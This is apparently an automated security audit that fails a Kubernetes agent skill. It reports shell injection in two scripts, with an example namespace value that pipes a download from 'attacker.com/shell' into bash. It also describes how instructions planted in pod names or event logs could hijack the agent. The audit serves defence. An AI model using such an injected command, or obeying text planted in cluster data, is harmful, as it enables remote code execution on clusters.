skills/openclaw/skills/kubernetes/Gen Agent Trust Hub

kubernetes

Fail

Audited by Gen Agent Trust Hub on Feb 19, 2026

Risk Level: HIGH (COMMAND_EXECUTION, PROMPT_INJECTION)
Full Analysis
  • COMMAND_EXECUTION (HIGH): The script scripts/security-audit.sh is vulnerable to shell command injection.
      • Evidence: The variable $NS_FLAG is constructed using the user-supplied $NAMESPACE argument and then used unquoted in commands like kubectl get pods $NS_FLAG. An attacker providing a namespace like default; curl attacker.com/shell | bash would trigger the execution of the injected command.
  • COMMAND_EXECUTION (HIGH): The script scripts/generate-manifest.sh is vulnerable to command injection through shell expansion in heredocs.
      • Evidence: The script uses cat << EOF to generate YAML manifests using variables like $NAME and $NAMESPACE. Because the EOF delimiter is unquoted, the shell will perform variable expansion and command substitution (e.g., $(command)) inside the heredoc before it is output. If the agent interpolates untrusted data into these arguments, it could lead to arbitrary code execution.
  • PROMPT_INJECTION (LOW): The skill is susceptible to Indirect Prompt Injection (Category 8) due to its extensive use of cluster metadata as input for management tasks.
      • Ingestion points: Multiple scripts (cluster-health-check.sh, pre-upgrade-check.sh, security-audit.sh) ingest pod names, status messages, and event logs via kubectl.
      • Boundary markers: None. Data is read directly into shell variables or printed to stdout for the agent to process.
      • Capability inventory: The skill possesses high-privilege capabilities including draining nodes, syncing ArgoCD applications, and generating security manifests.
      • Sanitization: While scripts use jq for structured data parsing, there is no sanitization of string content (like pod names) that might contain malicious instructions targeting the agent's logic.
  • CREDENTIALS_UNSAFE (SAFE): scripts/generate-manifest.sh contains placeholder credentials (e.g., your-api-key-here). These are clearly illustrative and do not represent a leak of active secrets.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Feb 19, 2026, 09:14 AM